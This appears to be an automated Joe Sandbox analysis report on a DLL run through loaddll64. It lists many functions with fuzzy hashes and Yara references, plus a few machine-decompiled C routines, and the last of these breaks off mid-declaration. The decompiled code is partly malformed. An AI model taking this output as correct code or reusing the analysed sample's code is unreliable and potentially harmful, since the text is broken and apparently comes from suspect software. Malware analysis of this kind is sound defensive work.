Instruction Fuzzy Hash: C691197090470CAFDB98DF68C04669DBBF2FB48344F40C1ADE849AB690D7759A19CB85

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001B2F0 Relevance: .2, Instructions: 174COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4ff37af258a23db5c01797c23f2434de8658ec910b62f667d3e0b084e4f6255
Instruction ID: ee1a5b038e23b1b762728b601e6c99c8254ef48870683394c78a05e9b81e4730
Opcode Fuzzy Hash: f4ff37af258a23db5c01797c23f2434de8658ec910b62f667d3e0b084e4f6255
Instruction Fuzzy Hash: 9A61457160460C8BDB6CDF38D4866A93BE5FB58740F24613DF866C72A2DB74D906CB44

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000741C Relevance: .2, Instructions: 164COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 411371247076829a3ed050940fe1e65d63f7276580b25cd8f2de86b758f4f241
Instruction ID: 124210ae31362696c8e7c7fc55ee17b9d1fa189669067b7980e05abe0ce7dbb4
Opcode Fuzzy Hash: 411371247076829a3ed050940fe1e65d63f7276580b25cd8f2de86b758f4f241
Instruction Fuzzy Hash: 9C81CF7190471C8FEB65DFA8C48968DBFF0FB58388F20461EE815A7262DB749945CF81

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001629C Relevance: .1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9dac85506b1f04058cb15554c85bbceb8ebb7a831f5bd702a5d02e9f92134646
Instruction ID: 378d96e7360db12acf5ccb9a2c1092155fc294dfe99add9db15bd0895a73080d
Opcode Fuzzy Hash: 9dac85506b1f04058cb15554c85bbceb8ebb7a831f5bd702a5d02e9f92134646
Instruction Fuzzy Hash: 74516C71524A8CABDBCDCE28D8C6A993BA0FB15344F90621DFC46C7292CB74D985CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA0AE6ABC0 Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.317718114.00007FFA0AE61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA0AE60000, based on PE: true

Associated: 00000000.00000002.317702868.00007FFA0AE60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317828419.00007FFA0AE98000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317959421.00007FFA0AEDE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317967572.00007FFA0AEE2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317976558.00007FFA0AEE5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317984038.00007FFA0AEE7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa0ae60000_loaddll64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a302809728b8e03c07a5101cfacb15d383c3ede7fbfee8270d7ccf682f85e519
Instruction ID: 7c81ceb65af43c9ddbaf0a649fdfe5d4ba1abab51ce7285c781eb1079b0ff071
Opcode Fuzzy Hash: a302809728b8e03c07a5101cfacb15d383c3ede7fbfee8270d7ccf682f85e519
Instruction Fuzzy Hash: 3E412752F69BDA47EE03AF7AA4137B00A00AFA77C1F41E772ED1A77B11EB1954568200

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA0AE6A370 Relevance: .1, Instructions: 126
COMMONLIBRARYCODECrypto

Download Yara Rule

C-Code - Quality: 60%

			E00007FFA7FFA0AE6A370(signed int __edx, void* __edi, void* __esp, long long __rbx, signed long long*** __rcx, long long __rsi) {
				void* _t24;
				int _t26;
				signed int _t51;
				void* _t52;
				signed long long _t66;
				signed int* _t73;
				signed long long _t75;
				signed long long _t77;
				signed long long _t78;
				signed long long _t95;
				signed long long _t96;
				signed long long _t98;
				signed long long _t104;
				long long _t115;
				void* _t117;
				void* _t120;
				signed long long* _t123;
				signed long long _t124;
				signed long long _t126;
				signed long long _t129;
				signed long long*** _t132;

				_t52 = __edi;
				_t51 = __edx;
				 *((long long*)(_t117 + 0x10)) = __rbx;
				 *((long long*)(_t117 + 0x18)) = _t115;
				 *((long long*)(_t117 + 0x20)) = __rsi;
				_t66 =  *((intOrPtr*)(__rcx));
				_t132 = __rcx;
				_t73 =  *_t66;
				if (_t73 == 0) goto 0xae6a504;
				_t124 =  *0xaede008; // 0xa3acf2c2a32b
				_t111 =  *_t73 ^ _t124;
				asm("dec eax");
				_t75 = _t73[4] ^ _t124;
				asm("dec ecx");
				asm("dec eax");
				if ((_t73[2] ^ _t124) != _t75) goto 0xae6a476;
				_t77 = _t75 - ( *_t73 ^ _t124) >> 3;
				_t101 =  >  ? _t66 : _t77;
				_t6 = _t115 + 0x20; // 0x20
				_t102 = ( >  ? _t66 : _t77) + _t77;
				_t103 =  ==  ? _t66 : ( >  ? _t66 : _t77) + _t77;
				if (( ==  ? _t66 : ( >  ? _t66 : _t77) + _t77) - _t77 < 0) goto 0xae6a412;
				_t7 = _t115 + 8; // 0x8
				r8d = _t7;
				E00007FFA7FFA0AE6D858(_t6, r10d & 0x0000003f, __esp, _t77, _t111,  ==  ? _t66 : ( >  ? _t66 : _t77) + _t77, _t111, _t115, _t120);
				_t24 = E00007FFA7FFA0AE6A9DC(_t66, _t111);
				if (_t66 != 0) goto 0xae6a43a;
				_t104 = _t77 + 4;
				r8d = 8;
				E00007FFA7FFA0AE6D858(_t24, 0, __esp, _t77, _t111, _t104, _t111, _t115, _t120);
				_t129 = _t66;
				_t26 = E00007FFA7FFA0AE6A9DC(_t66, _t111);
				if (_t129 == 0) goto 0xae6a504;
				_t123 = _t129 + _t77 * 8;
				_t78 = _t129 + _t104 * 8;
				_t88 =  >  ? _t115 : _t78 - _t123 + 7 >> 3;
				_t64 =  >  ? _t115 : _t78 - _t123 + 7 >> 3;
				if (( >  ? _t115 : _t78 - _t123 + 7 >> 3) == 0) goto 0xae6a476;
				memset(_t52, _t26, 0 << 0);
				_t126 =  *0xaede008; // 0xa3acf2c2a32b
				r8d = 0x40;
				_t14 =  &(_t123[1]); // 0x7ffa0ae61024
				asm("dec eax");
				 *_t123 =  *(_t132[1]) ^ _t126;
				_t95 =  *0xaede008; // 0xa3acf2c2a32b
				asm("dec eax");
				 *( *( *_t132)) = _t129 ^ _t95;
				_t96 =  *0xaede008; // 0xa3acf2c2a32b
				asm("dec eax");
				( *( *_t132))[1] = _t14 ^ _t96;
				_t98 =  *0xaede008; // 0xa3acf2c2a32b
				r8d = r8d - (_t51 & 0x0000003f);
				asm("dec eax");
				( *( *_t132))[2] = _t78 ^ _t98;
				goto 0xae6a507;
				return 0xffffffff;
			}

0x7ffa0ae6a370
0x7ffa0ae6a370
0x7ffa0ae6a370
0x7ffa0ae6a375
0x7ffa0ae6a37a
0x7ffa0ae6a388
0x7ffa0ae6a38d
0x7ffa0ae6a390
0x7ffa0ae6a396
0x7ffa0ae6a39c
0x7ffa0ae6a3b4
0x7ffa0ae6a3ba
0x7ffa0ae6a3bd
0x7ffa0ae6a3c0
0x7ffa0ae6a3c3
0x7ffa0ae6a3c9
0x7ffa0ae6a3d7
0x7ffa0ae6a3e1
0x7ffa0ae6a3e5
0x7ffa0ae6a3e8
0x7ffa0ae6a3eb
0x7ffa0ae6a3f2
0x7ffa0ae6a3f4
0x7ffa0ae6a3f4
0x7ffa0ae6a3fe
0x7ffa0ae6a408
0x7ffa0ae6a410
0x7ffa0ae6a412
0x7ffa0ae6a416
0x7ffa0ae6a422
0x7ffa0ae6a429
0x7ffa0ae6a42c
0x7ffa0ae6a434
0x7ffa0ae6a441
0x7ffa0ae6a445
0x7ffa0ae6a45d
0x7ffa0ae6a461
0x7ffa0ae6a464
0x7ffa0ae6a46c
0x7ffa0ae6a46f
0x7ffa0ae6a476
0x7ffa0ae6a47c
0x7ffa0ae6a495
0x7ffa0ae6a49b
0x7ffa0ae6a49e
0x7ffa0ae6a4b1
0x7ffa0ae6a4ba
0x7ffa0ae6a4c0
0x7ffa0ae6a4d1
0x7ffa0ae6a4da
0x7ffa0ae6a4de
0x7ffa0ae6a4ea
0x7ffa0ae6a4f3
0x7ffa0ae6a4fe
0x7ffa0ae6a502
0x7ffa0ae6a51f

Memory Dump Source

Source File: 00000000.00000002.317718114.00007FFA0AE61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA0AE60000, based on PE: true

Associated: 00000000.00000002.317702868.00007FFA0AE60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317828419.00007FFA0AE98000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317959421.00007FFA0AEDE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317967572.00007FFA0AEE2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317976558.00007FFA0AEE5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317984038.00007FFA0AEE7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa0ae60000_loaddll64.jbxd

Similarity

API ID: ErrorLastPrivilegeRelease
String ID:
API String ID: 1334314998-0
Opcode ID: ed3b70687e7945458bcaab2cb262aa06014580efde759abfe4f9ab75d549e353
Instruction ID: 321b450d30f5c02e4759ab158f262ede06344e16aa4eb56428e4bb9069909f9c
Opcode Fuzzy Hash: ed3b70687e7945458bcaab2cb262aa06014580efde759abfe4f9ab75d549e353
Instruction Fuzzy Hash: 1B41C433B14A6482EF44DF3AE92817963A1BB49FD4B49D436DE4D97B58EE3CD4458300

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180013698 Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0fd7e54c2e3c2eb2f4057fbf02f2f3a8737c251e610f5f48a5c25456a3c2a7c7
Instruction ID: 707c8c7feef62a70d2195b75d5e6b66e4219545dc678810288b7b2209aceacb9
Opcode Fuzzy Hash: 0fd7e54c2e3c2eb2f4057fbf02f2f3a8737c251e610f5f48a5c25456a3c2a7c7
Instruction Fuzzy Hash: 1161917154878DDBEBBACF24D88A7D97BB0FB48314F904219D84E8E290DB74574ACB41

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180011DAC Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a779fa67324b10137dca71439002aac2bbc9acba917943a89a2440558f265d6
Instruction ID: 49561eaafaa20b5dbb512bdc2e8c8324cc323e320cbd5a294de7a2bbabfa02a5
Opcode Fuzzy Hash: 8a779fa67324b10137dca71439002aac2bbc9acba917943a89a2440558f265d6
Instruction Fuzzy Hash: 3351B07051478C8BEBBACF28DC9A7DB3BB1FB48704F50421DA84E8E2A0DB765645CB41

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000D1AC Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de15e4835354da21c21c581afa9e1e49ad56d5e721c00a56a2a0f9a367a7b1e2
Instruction ID: cab1e4afcb3e4e3efad056c987e19407a7ae96f8ba765043352ee3f473a28ce2
Opcode Fuzzy Hash: de15e4835354da21c21c581afa9e1e49ad56d5e721c00a56a2a0f9a367a7b1e2
Instruction Fuzzy Hash: 7A51597191474DCBDF6DCF68C88A6DDBBB0FF08344F004219E94662291DB799949CF85

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180020930 Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1891d7c6e5579f1ddf716b9efe699b55b9d074dc8e7dc217c6cd483ac21faf1f
Instruction ID: 0d5a1e45f689093ba705f26d6d0b7ee4761fe465e88e59cb2662693f670c6f5b
Opcode Fuzzy Hash: 1891d7c6e5579f1ddf716b9efe699b55b9d074dc8e7dc217c6cd483ac21faf1f
Instruction Fuzzy Hash: 99517CB590034A8FDB88CF64C58A4DF7FB0BB68398F204619F856962A0D374D6A5CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000E570 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0947fb190b259f2f036e8e13266f38e419df21044a1d34d71fc6672665701d99
Instruction ID: 6b1a579500f7469a5a283cf0a7520b14203c8905753f3a8ac0622774f88945dd
Opcode Fuzzy Hash: 0947fb190b259f2f036e8e13266f38e419df21044a1d34d71fc6672665701d99
Instruction Fuzzy Hash: 1241D3B050034E8BDB48CF64D88A4DE7FF0FB68398F214619F859A6250D378D6A4CBC5

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180013524 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95e6112c03750f4c0630cdb5a18b98eee8cc7382c4e8c9e1a176535c4f274712
Instruction ID: 4275e61531d4984f43622383f8721a212c43d9f9e5acc043d588a3e2cbca8aaf
Opcode Fuzzy Hash: 95e6112c03750f4c0630cdb5a18b98eee8cc7382c4e8c9e1a176535c4f274712
Instruction Fuzzy Hash: 0741D2B090074E8FDB48CF64C98A5DE7FB1FBA8394F204219EC4AA6250D374D6A4CBC5

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180015508 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8348d3cd7f29255d4884c11fe93a9125b21d4f4a43616c69afa397f7f63962af
Instruction ID: afd4a856b60e5dc0eb8acee87462e8dc665325ca188dc724d3a88843a6c40c3d
Opcode Fuzzy Hash: 8348d3cd7f29255d4884c11fe93a9125b21d4f4a43616c69afa397f7f63962af
Instruction Fuzzy Hash: 6041AFB180438E8FDF48CF64C88A5DE7BB0FB58348F104A19E86696264D3B9D664CFD5

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180017198 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c4ca00263a0247c4b651e916fb7a83a9bfa1ce2ae173780690b90c0a27bb6f5
Instruction ID: 224c6f81855e22c7893a2b7f2b7cfff3a5734a3a9938c9b8f57012155b825125
Opcode Fuzzy Hash: 6c4ca00263a0247c4b651e916fb7a83a9bfa1ce2ae173780690b90c0a27bb6f5
Instruction Fuzzy Hash: 3041B1B090478E8BDF49CF68D84A5DE7BA0FB58348F104A1DEC66A6294D3B4D664CBC4

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001E614 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f2ddded83ff06c7b56f3b031172a418f339d67288712c2ef59fbdfb7de3fa65
Instruction ID: 49a2f425b0a366156263d2a3b3444c35eadce35315b0c57ee30031dbbbdec485
Opcode Fuzzy Hash: 6f2ddded83ff06c7b56f3b031172a418f339d67288712c2ef59fbdfb7de3fa65
Instruction Fuzzy Hash: FB41E6B090034A8BDF48DF68C88A5DE7FB1FB58358F10461DF85AA6390D37896A5CBC5

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180013B88 Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9a747ab3829d035c160e30ca67f218d8c010ef4ce6a01bc2123f51e37c39b15
Instruction ID: 6daa388222a5a84c7974237e422c02caa7ff578f64bce21c4d2575711bd59858
Opcode Fuzzy Hash: e9a747ab3829d035c160e30ca67f218d8c010ef4ce6a01bc2123f51e37c39b15
Instruction Fuzzy Hash: EB41D5B190074E8BDF48CF64C48A5DE7FB0FB68358F214618E855A6290D3B8D6A5CFC5

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000BE34 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4a31af1c88a1e6ab448c518336f099c9e743a345a8116ccbb9bcacf6df5466d
Instruction ID: d8d0a970803080bdb9b0c4b9adcb29ea95a621f075ad5d7819bf759c13dfa2c1
Opcode Fuzzy Hash: d4a31af1c88a1e6ab448c518336f099c9e743a345a8116ccbb9bcacf6df5466d
Instruction Fuzzy Hash: AE3105B090034A8BDB4CDF68C88A4DE3FA1BB58398F10461DFC5A9A350D3B4D9A4CBC5

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180012110 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69f1bd5eb2f0ebfb53ff7e4ae7896f851b8bbd9ae22bdf3f2cf4232ccd8f10e8
Instruction ID: 8f5d51aba00c4f23d52c296157a313ffc4782a84c6f71662d1847f1d9af8e599
Opcode Fuzzy Hash: 69f1bd5eb2f0ebfb53ff7e4ae7896f851b8bbd9ae22bdf3f2cf4232ccd8f10e8
Instruction Fuzzy Hash: E431ADB55187818BC348DF28C54A51ABBE1FB8C308F504B2EF8CAA6294D778D6058B4A

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800197AC Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1cb5be32486d082a1004d5cd3269ee3ed63ecfe90488e34a48b9d161af83a4e
Instruction ID: 79354f79ef65217a83ad5669e5e5daff520c5b483ab2cf90db9683dfdc12feb2
Opcode Fuzzy Hash: a1cb5be32486d082a1004d5cd3269ee3ed63ecfe90488e34a48b9d161af83a4e
Instruction Fuzzy Hash: A331C5B190434A8BDB48DF24C88A5DE7FF0FB58388F10461CE85AA7250D3B4D6A4CBC5

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180020D54 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 403423f91ab6d2efc18bb9c6fca72d8179c469d66eb0a9203399f0508270c383
Instruction ID: f7e907a5a4d268517ac5d39fb781b2abcac55db7633d781cedf7f9941ca353e5
Opcode Fuzzy Hash: 403423f91ab6d2efc18bb9c6fca72d8179c469d66eb0a9203399f0508270c383
Instruction Fuzzy Hash: 8F21A0B152C781AFD388DF28C19981ABBE1FB88304F806A1DF98687350D374D844CB46

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000E828 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7bd384b18a8f018deb1ae8c02f50e3dfc83e34399570a2e179077375e0c66cc5
Instruction ID: e563aa27f56e2ecce816434c0e114442c931e28e35474e2e86562d3eaff730a2
Opcode Fuzzy Hash: 7bd384b18a8f018deb1ae8c02f50e3dfc83e34399570a2e179077375e0c66cc5
Instruction Fuzzy Hash: 8931707552D784AFC788DF28D48991EBBF0FB98345F906A1DF88686264E374D445CB02

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180022B8C Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa0a547024bc87cfc42133694cef77c279f754c0bf310b00985741a0ad6876d3
Instruction ID: cfe9eacf390d468c13f16f556d0757c07c704974f4e6988c0e8e4883957bcd26
Opcode Fuzzy Hash: fa0a547024bc87cfc42133694cef77c279f754c0bf310b00985741a0ad6876d3
Instruction Fuzzy Hash: 95316174529380AFD398DF28D48A81BBBF0FB99314F806E1DF9C68A2A0D774D405CB42

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000E368 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f840c702cc6db683c56574f5bbeabe7a5e8170610e02f4bacfea2193c17d021
Instruction ID: 95bb47a97fe7a9d8d529fae77a119aa2dd9a35a31096ffbc611f9293c9fe5b2f
Opcode Fuzzy Hash: 0f840c702cc6db683c56574f5bbeabe7a5e8170610e02f4bacfea2193c17d021
Instruction Fuzzy Hash: 2531F17080438E8BDB48CF64C8865DFBFB0FB48358F104A19EC5AA6250D7B89664CFC5

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180015400 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.316812767.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3589b8c10d41c6a6d8f55a96a52859424ad6790b55d32d6910364891c60a7e75
Instruction ID: aca377b28207093ad69189230e20808a2953a665cdfbd0516b7c3ce528793aa5
Opcode Fuzzy Hash: 3589b8c10d41c6a6d8f55a96a52859424ad6790b55d32d6910364891c60a7e75
Instruction Fuzzy Hash: 7F2168B15187808BD348DF28D54951ABBE1BB8C30CF400B2DF8CAAA2A1D778D604CF4A

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA0AE6AB50 Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E00007FFA7FFA0AE6AB50(intOrPtr __ebx, intOrPtr __edx, signed int __rax, signed int __rdx, void* __r8, signed long long _a8) {
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* _t25;

				_t25 = __r8;
				r8d = 0;
				 *0xaedf4f8 = r8d;
				_t1 = _t25 + 1; // 0x1
				r9d = _t1;
				asm("cpuid");
				_v16 = r9d;
				_v16 = 0;
				_v20 = __ebx;
				_v12 = __edx;
				if (0 != 0x18001000) goto 0xae6abb1;
				asm("xgetbv");
				_a8 = __rdx << 0x00000020 | __rax;
				r8d =  *0xaedf4f8; // 0x1
				r8d =  ==  ? r9d : r8d;
				 *0xaedf4f8 = r8d;
				 *0xaedf4fc = r8d;
				return 0;
			}

0x7ffa0ae6ab50
0x7ffa0ae6ab56
0x7ffa0ae6ab5b
0x7ffa0ae6ab62
0x7ffa0ae6ab62
0x7ffa0ae6ab69
0x7ffa0ae6ab6b
0x7ffa0ae6ab73
0x7ffa0ae6ab79
0x7ffa0ae6ab7d
0x7ffa0ae6ab83
0x7ffa0ae6ab87
0x7ffa0ae6ab91
0x7ffa0ae6ab9b
0x7ffa0ae6aba6
0x7ffa0ae6abaa
0x7ffa0ae6abb1
0x7ffa0ae6abbf

Memory Dump Source

Source File: 00000000.00000002.317718114.00007FFA0AE61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA0AE60000, based on PE: true

Associated: 00000000.00000002.317702868.00007FFA0AE60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317828419.00007FFA0AE98000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317959421.00007FFA0AEDE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317967572.00007FFA0AEE2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317976558.00007FFA0AEE5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.317984038.00007FFA0AEE7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa0ae60000_loaddll64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d266753878d099352c440ad7ca346e4687f286913e8b3a6842572f5f5984201
Instruction ID: ae1f640db45fbd43ef5826b889e9d689b1c9f6ee51416a358a71e7a624ca8c87
Opcode Fuzzy Hash: 0d266753878d099352c440ad7ca346e4687f286913e8b3a6842572f5f5984201
Instruction Fuzzy Hash: 41F06872B182668ADB94DF38F442A297BD0EB083C0FA0C079D69D87B04D63C90508F14

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA0AE63240 Relevance: 55.8, APIs: 37, Instructions: 252
COMMON

Download Yara Rule

C-Code - Quality: 49%

			E00007FFA7FFA0AE63240(void* __edx, void* __eflags, long long __rax, long long __rcx, long long __rdx, long long __r8, long long __r9, long long _a8, long long _a16, long long _a24, long long _a32, intOrPtr _a40, long long _a48) {
				long long _v16;
				long long _v24;
				long long _v32;
				long long _v40;
				long long _v48;
				long long _v56;
				long long _v64;
				long long _v72;
				long long _v80;
				long long _v88;
				long long _v96;
				long long _v104;
				long long _v112;
				long long _v120;
				long long _v128;
				long long _v136;
				long long _t207;
				intOrPtr* _t209;
				intOrPtr _t218;
				intOrPtr _t221;
				long long _t223;
				void* _t225;
				intOrPtr _t228;
				long long _t229;
				void* _t230;
				intOrPtr _t235;
				long long _t237;
				void* _t239;
				void* _t243;
				long long _t245;
				void* _t247;
				long long _t248;
				void* _t249;
